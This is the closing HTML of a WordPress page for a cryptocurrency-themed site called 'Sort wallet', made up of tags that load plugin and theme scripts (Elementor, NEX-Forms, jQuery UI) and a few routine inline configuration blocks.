<link rel='stylesheet' id='nex-forms-animations-css'  href='../wp-content/plugins/nex-forms-express-wp-form-builder/public/css/min/animate062a.css?ver=7.8.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='nex-forms-materialize-css'  href='../wp-content/plugins/nex-forms-express-wp-form-builder/public/css/min/materialize-ui062a.css?ver=7.8.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='e-animations-css'  href='../wp-content/plugins/elementor/assets/lib/animations/animations.mincd45.css?ver=3.4.3' type='text/css' media='all' />
<script type='text/javascript' src='../wp-includes/js/jquery/ui/core.min35d0.js?ver=1.12.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='../wp-includes/js/jquery/ui/menu.min35d0.js?ver=1.12.1' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='../wp-includes/js/dist/vendor/regenerator-runtime.minb36a.js?ver=0.13.7' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='../wp-includes/js/dist/vendor/wp-polyfill.min2c7c.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='../wp-includes/js/dist/dom-ready.min7354.js?ver=71883072590656bf22c74c7b887df3dd' id='wp-dom-ready-js'></script>
<script type='text/javascript' src='../wp-includes/js/dist/hooks.mine16b.js?ver=a7edae857aab69d69fa10d5aef23a5de' id='wp-hooks-js'></script>
<script type='text/javascript' src='../wp-includes/js/dist/i18n.min71a7.js?ver=5f1269854226b4dd90450db411a12b79' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' id='wp-a11y-js-translations'>
( function( domain, translations ) {
	var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
	localeData[""].domain = domain;
	wp.i18n.setLocaleData( localeData, domain );
} )( "default", { "locale_data": { "messages": { "": {} } } } );
</script>
<script type='text/javascript' src='../wp-includes/js/dist/a11y.minac6e.js?ver=0ac8327cc1c40dcfdf29716affd7ac63' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='../wp-includes/js/jquery/ui/autocomplete.min35d0.js?ver=1.12.1' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='../wp-includes/js/jquery/ui/mouse.min35d0.js?ver=1.12.1' id='jquery-ui-mouse-js'></script>
<script type='text/javascript' src='../wp-includes/js/jquery/ui/slider.min35d0.js?ver=1.12.1' id='jquery-ui-slider-js'></script>
<script type='text/javascript' src='../wp-includes/js/jquery/jquery.form.minb2f9.js?ver=4.3.0' id='jquery-form-js'></script>
<script type='text/javascript' src='../wp-includes/js/jquery/jquery.ui.touch-punchc682.js?ver=0.2.2' id='jquery-touch-punch-js'></script>
<script type='text/javascript' src='../../cdnjs.cloudflare.com/ajax/libs/money.js/0.2.0/money.mine480.js?ver=0.2.0' id='money-js-js'></script>
<script type='text/javascript' id='vcw-script-js-before'>
var VirtualCoinWidgets = {ajax_url: "https://sortwallet.net/wp-admin/admin-ajax.php"};
</script>
<script type='text/javascript' src='../wp-content/plugins/virtual_coin_widgets/assets/js/vcw.min605a.js?ver=2.2.2' id='vcw-script-js'></script>
<script type='text/javascript' src='../wp-content/themes/crypterio/assets/js/bootstrap.minb2da.js?ver=2.4.3' id='bootstrap-js'></script>
<script type='text/javascript' src='../wp-content/themes/crypterio/assets/js/vendors/select2.minb2da.js?ver=2.4.3' id='select2-js'></script>
<script type='text/javascript' src='../wp-content/themes/crypterio/assets/js/lazysizes-umd.minb2da.js?ver=2.4.3' id='lazysizes-umd.min-js'></script>
<script type='text/javascript' src='../wp-content/themes/crypterio/assets/js/customb2da.js?ver=2.4.3' id='crypterio-custom-js'></script>
<script type='text/javascript' src='../wp-content/plugins/pearl-header-builder/assets/frontend/assets/js/app5152.js?ver=1.0' id='stm_hb_scripts-js'></script>
<script type='text/javascript' src='../wp-content/plugins/pearl-header-builder/assets/frontend/assets/js/sticky5152.js?ver=1.0' id='stm_hb_scripts_sticky-js'></script>
<script type='text/javascript' src='../wp-includes/js/wp-embed.min080f.js?ver=5.8.2' id='wp-embed-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/public/js/min/bootstrap.min062a.js?ver=7.8.6.1' id='nex-forms-bootstrap.min-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/libs/wow.min062a.js?ver=7.8.6.1' id='nex-forms-wow-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/public/js/min/jquery.raty-fa062a.js?ver=7.8.6.1' id='nex-forms-raty-fa-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/libs/materialize.min062a.js?ver=7.8.6.1' id='nex-forms-materialize.min-js'></script>
<script type='text/javascript' id='nex-forms-materialize.min-js-after'>
var get_wow = "enabled";var get_raty = "enabled";
var get_wow = "enabled";var get_raty = "enabled";
var get_wow = "enabled";var get_raty = "enabled";
</script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/public/js/min/jquery.timer062a.js?ver=7.8.6.1' id='nex-forms-timer-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/public/js/nexf-onload-ui062a.js?ver=7.8.6.1' id='nex-forms-onload-js'></script>
<script type='text/javascript' id='nex-forms-onload-js-after'>
function nf_custom_user_func_before_submit(formData, jqForm, options){return true;}
function nf_custom_user_func_after_submit(formData, jqForm, options, $form){return true;}
function nf_custom_user_func_before_submit(formData, jqForm, options){return true;}
function nf_custom_user_func_after_submit(formData, jqForm, options, $form){return true;}
function nf_custom_user_func_before_submit(formData, jqForm, options){return true;}
function nf_custom_user_func_after_submit(formData, jqForm, options, $form){return true;}
</script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/libs/math.min062a.js?ver=7.8.6.1' id='nex-forms-math.min-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/libs/moment.min062a.js?ver=7.8.6.1' id='nex-forms-moment.min-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/libs/locales.min062a.js?ver=7.8.6.1' id='nex-forms-locales.min-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/public/js/bootstrap-datetimepicker062a.js?ver=7.8.6.1' id='nex-forms-bootstrap-datetimepicker-js'></script>
<script type='text/javascript' src='../wp-content/plugins/nex-forms-express-wp-form-builder/public/js/min/jquery.bootstrap-touchspin062a.js?ver=7.8.6.1' id='nex-forms-bootstrap-touchspin-js'></script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/js/webpack.runtime.mincd45.js?ver=3.4.3' id='elementor-webpack-runtime-js'></script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/js/frontend-modules.mincd45.js?ver=3.4.3' id='elementor-frontend-modules-js'></script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min05da.js?ver=4.0.2' id='elementor-waypoints-js'></script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/lib/swiper/swiper.min48f5.js?ver=5.3.6' id='swiper-js'></script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/lib/share-link/share-link.mincd45.js?ver=3.4.3' id='share-link-js'></script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/lib/dialog/dialog.mina288.js?ver=4.8.1' id='elementor-dialog-js'></script>
<script type='text/javascript' id='elementor-frontend-js-before'>
var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Share on Facebook","shareOnTwitter":"Share on Twitter","pinIt":"Pin it","download":"Download","downloadImage":"Download image","fullscreen":"Fullscreen","zoom":"Zoom","share":"Share","playVideo":"Play Video","previous":"Previous","next":"Next","close":"Close"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Extra","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Extra","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Widescreen","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.4.3","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"a11y_improvements":true,"e_import_export":true,"additional_custom_breakpoints":true,"landing-pages":true,"elements-color-picker":true,"admin-top-bar":true},"urls":{"assets":"https:\/\/sortwallet.net\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":3931,"title":"Sort%20wallet","excerpt":"","featuredImage":false}};
</script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/js/frontend.mincd45.js?ver=3.4.3' id='elementor-frontend-js'></script>
<script type='text/javascript' src='../wp-content/plugins/elementor/assets/js/preloaded-modules.mincd45.js?ver=3.4.3' id='preloaded-modules-js'></script>
</body>

</html>
